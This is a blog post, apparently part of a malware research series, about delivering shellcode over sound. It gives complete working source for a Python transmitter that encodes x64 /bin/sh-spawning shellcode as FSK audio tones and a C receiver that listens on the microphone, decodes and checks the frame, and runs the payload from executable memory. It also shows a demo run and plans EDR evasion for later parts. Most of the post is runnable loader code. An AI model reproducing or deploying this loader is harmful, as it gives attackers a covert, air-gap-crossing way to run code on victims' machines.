12 minute read

Hello, cybersecurity enthusiasts and white hackers!

malware

This is the second post in our series on Signal Processing and Math for Malware R&D. In part 1, we proved that we could turn bytes into sound. However, if you tried to run that code in a noisy room, you likely noticed it rarely worked.

Today, we solve the two biggest enemies of acoustic data transfer: Framing and Synchronization. We will transform our “beeping” script into a real-use communication protocol.

the problem

In our initial research, we sent raw bits. This approach fails in real-world scenarios for two technical reasons: First of all, the receiver doesn’t know exactly when the first bit begins. If it starts recording even 5 milliseconds late, it misses the start of the first sine wave. Second problem is bit straddling. If the receiver’s 160-sample window starts in the middle of a bit, the Goertzel filter sees half of a 1 and half of a 0. The resulting signal values are ambiguous, leading to a “bit-flip” and corrupted shellcode.

To fix this, we need to wrap our shellcode in a frame.

defining the protocol frame

In the simple words, a frame is a structured packet that tells the receiver something like: “get ready, here is how much data is coming, and here is a way to check if it arrived safely.”

Our frame structure:

malware

What is the preamble here? We use 0xAA 0xAA 0xAA 0xAA 0x7E. The alternating bits (1010...) help the receiver find the “pulse” of the transmission. Two bytes in length is a big-endian integer representing the shellcode size. By reading the length byte right after the preamble, the receiver knows exactly how many 160-sample windows to process sequentially, ensuring perfect synchronization without slipping into mid-bit boundaries. Finally, a checksum is a XOR sum of the payload to ensure integrity. So, in our code, we need the following logic: if a residual bit flip still occurs due to background acoustic noise, the checksum validation fails, dropping the packet instead of passing corrupted payload bytes to the execution engine.

In Python, building this frame looks like this:

def build_frame(payload):
    # calculate XOR checksum
    cksum = 0
    for b in payload:
        cksum ^= b
    # combine everything into one byte array
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

brute-force strategy in receiver

The biggest challenge in the C receiver is sample alignment. Since we don’t know where the bit grid starts, we use a “brute-force” strategy. We record a 6-second chunk of audio. Then, we try to demodulate it 16 different times, shifting the starting point by 10 samples each time (since one bit is 160 samples, 160/16 = 10). One of these 16 attempts must align perfectly with the transmitter’s grid.

The logic in C looks like this:

for (int t = 0; t < 16; t++) {
  int offset = t * 10; // try every 10th sample
  if (try_offset(audio_buffer, total_samples, offset)) {
    // success! frame found and executed.
    break; 
  }
}

demodulation via Goertzel

For every 160-sample window, we apply the Goertzel algorithm. It acts as a high-speed “tuning fork” for our frequencies: 2200 Hz (Mark) and 1200 Hz (Space).

malware

The math for our filter coefficient \( w \) is: \(\omega = \frac{2\pi \cdot f_{target}}{f_{sampling}}, \quad w = 2 \cos(\omega)\)

For each trial offset, we convert the audio into a flat array of bits (0 or 1) and then scan that array for our 0xAA... preamble:

double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * M_PI * freq / SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0, q2 = 0, q0;
  for (int i = 0; i < n; i++) {
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1; q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

practical example

Let me try to explain the logic behind try_offset. Because the receiver starts recording at an arbitrary time, the “bit grid” is unknown. This function is designed to test a specific sample offset to see if it perfectly aligns with the transmitted tones.

Our function starts by slicing the raw audio buffer into bit-sized chunks (160 samples each), starting exactly at the provided offset:

int n_bits = (n_samples - offset) / SPB;
uint8_t *bits = malloc(n_bits);
for (int i = 0; i < n_bits; i++) {
  double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
  double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
  bits[i] = (pm > ps) ? 1 : 0;
}

In general, here we convert the “analog” audio samples into a digital array of 1s and 0s.

If \( pm > ps \), we record a 1. Otherwise, a 0. By trying different offsets in the main loop, we eventually find one where the window doesn’t “straddle” two different bits, resulting in a clean digital signal.

Next we need a preable hunting logic. Once we have a bit array, we need to find where the actual data starts. We scan the array for our 40-bit preamble (0xAA 0xAA 0xAA 0xAA 0x7E):

for (int i = 0; i < n_bits - 80; i++) {
  int match = 1;
  for (int b = 0; b < 5; b++) 
    if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
  if (!match) continue;

Then extracting metadata (Length), so, immediately following the preamble are 16 bits (2 bytes) that define the shellcode size:

int cursor = i + 40; // skip preamble (40 bits)
uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
cursor += 16; // move past length field

The loader now knows exactly how many bytes to extract from the bit stream. It assembles the 16-bit integer from two 8-bit characters.

Then, the loader extracts the payload byte-by-byte while simultaneously calculating an XOR checksum:

uint8_t *payload = malloc(len);
uint8_t calc_cksum = 0;
for (int p = 0; p < len; p++) {
  payload[p] = get_byte(bits, cursor);
  calc_cksum ^= payload[p];
  cursor += 8;
}

What is the error detectin logic here? As each byte is recovered, it is XORed into calc_cksum. This ensures that any “acoustic interference” (like a door slamming or a cough) that flipped a bit will be detected.

At the last step, we need final verification and execution. If the checksum matches the final byte in the frame, we move from data processing to code execution:

if (calc_cksum == get_byte(bits, cursor)) {
  printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
  void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
  memcpy(mem, payload, len);
  ((void(*)())mem)();
  return 1;
}

If calc_cksum matches the received byte, we know the shellcode is 100% intact.

So, full source code of this function:

int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

The try_offset function is the core engine of our acoustic ear. It combines frequency detection with a brute-force alignment strategy. By iterating through sample offsets and verifying the result with an XOR checksum, the loader guarantees that it only executes a perfectly reconstructed payload, effectively turning a noisy room into a reliable delivery vector.

Otherwise, the logic is the same as in the first part, we use alsa/asoundlib.h. We configure the hardware to match our transmitter: 48,000 Hz sampling rate, Mono, and 16-bit signed format:

snd_pcm_t *handle;
snd_pcm_open(&handle, "default", SND_PCM_STREAM_CAPTURE, 0);
snd_pcm_set_params(handle, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, 48000, 1, 500000);

So, full source code for transmission is looks like this, includes the protocol framing and the live visualization for our research presentation:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 2: framing & sync
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# -- protocol constants (must match receiver.c) --
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1
FREQ_SPACE   = 1200          # bit 0
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit
PREAMBLE     = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

# -- visualization constants --
WINDOW_BITS  = 24
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30

# -- x64 Linux execve("/bin/sh") --
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def build_frame(payload):
    cksum = 0
    for b in payload: cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def generate_tone(bit):
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#ffffff', lw=0.8)
    ax_wave.set_ylim(-1.3, 1.3)
    ax_wave.set_axis_off()
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.0)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1.1)
    return fig, line_wave, line_spec

def transmit_live(payload):
    frame = build_frame(payload)
    body = np.concatenate([byte_to_signal(b) for b in frame])
    lead = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)

    fig, line_wave, line_spec = build_figure()
    plt.ion()
    plt.show()

    print(f"[=^..^=] shellcode: {len(payload)} bytes | frame: {len(frame)} bytes")
    sd.play(signal, SAMPLE_RATE)
    t_start = time.perf_counter()

    while True:
        elapsed = time.perf_counter() - t_start
        curr = int(elapsed * SAMPLE_RATE)
        if curr >= total_samples: break
        start = max(0, curr - WINDOW_SAMPS // 2)
        window = signal[start:start + WINDOW_SAMPS]
        if len(window) < WINDOW_SAMPS: window = np.pad(window, (0, WINDOW_SAMPS - len(window)))
        line_wave.set_ydata(window)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max()
        line_spec.set_ydata(mag)
        fig.canvas.draw_idle()
        plt.pause(1.0/TARGET_FPS)

    sd.wait()
    print("[=^..^=] transmission finished.")

if __name__ == "__main__":
    transmit_live(SHELLCODE)

and for receiver, full source code in C looks like this (receiver.c):

/*
 * receiver.c
 * batch FSK receiver with brute-force alignment scanning.
 * author: @cocomelonc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <math.h>
#include <sys/mman.h>
#include <alsa/asoundlib.h>

// Bell 202 and DSP Constants
#define PI          3.14159265358979323846
#define SAMPLE_RATE 48000
#define BAUD_RATE   300
#define FREQ_MARK   2200            // frequency for Bit 1
#define FREQ_SPACE  1200            // frequency for Bit 0
#define SPB         (SAMPLE_RATE / BAUD_RATE)   // samples per Bit (160)

// brute-force alignment parameters
#define CAPTURE_SECS 6              // capture duration
#define N_OFFSETS    16             // number of trial offsets per bit period
#define OFFSET_STEP  (SPB / N_OFFSETS) // 10 samples shift per trial

// frame preamble for synchronization
static const uint8_t PREAMBLE[] = {0xAA, 0xAA, 0xAA, 0xAA, 0x7E};

// Goertzel algorithm: detects the magnitude of a specific frequency in a block of samples
static double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * PI * freq / (double)SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0.0, q2 = 0.0, q0;
  for (int i = 0; i < n; i++) {
    // normalize 16-bit PCM to float and apply recursive filter
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1;
    q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

// reconstructs a byte from a bit stream (LSB-first)
uint8_t get_byte(const uint8_t *bits, int offset) {
  uint8_t res = 0;
  for (int i = 0; i < 8; i++) if (bits[offset + i]) res |= (uint8_t)(1u << i);
  return res;
}

// tries to decode the captured audio buffer starting at a specific sample offset
int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);

  // demodulate audio samples into a digital bit array
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  // scan bit array for the 40-bit preamble
  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    // preamble found: Extract 16-bit payload length
    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;

    // extract payload and calculate XOR checksum
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    // verify integrity against the checksum byte
    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      
      // allocate RWX memory and execute shellcode
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

int main() {
  snd_pcm_t *h;
  // setup ALSA capture device (microphone)
  snd_pcm_open(&h, "default", SND_PCM_STREAM_CAPTURE, 0);
  snd_pcm_set_params(h, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, SAMPLE_RATE, 1, 100000);

  // capture raw audio into memory buffer
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc(total * sizeof(int16_t));
  printf("[=^..^=] listening for 6 seconds...\n");
  snd_pcm_readi(h, buf, total);
  snd_pcm_close(h);

  // brute-force: try every possible sample alignment offset
  for (int t = 0; t < N_OFFSETS; t++) {
    if (try_offset(buf, total, t * OFFSET_STEP)) {
      free(buf); return 0;
    }
  }

  printf("[=^..^=] no valid payload found.\n");
  free(buf); return 1;
}

demo

Let’s see this in action.

First of all, compile our receiver:

gcc receiver.c -o receiver -lasound -lm

malware

Then, run it:

./receiver

malware

Within the 6-second window, run transmitter:

python3 transmit_live.py

malware

malware

malware

malware

malware

As we can see, checksum is ok, shellcode successfully spawned. In my case, I had to run transmitter three times.

conslusion

We have built a reliable physical-layer link. However, there is a remaining problem: if an EDR scans the memory of our receiver while it is recording, it might see the shellcode bytes in the bits or payload arrays.

In the next parts, we will introduce the Discrete Fourier Transform (DFT) again. We will stop sending raw bits and start sending frequency coefficients, ensuring the shellcode only exists as “mathematical noise” until the moment of execution.

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine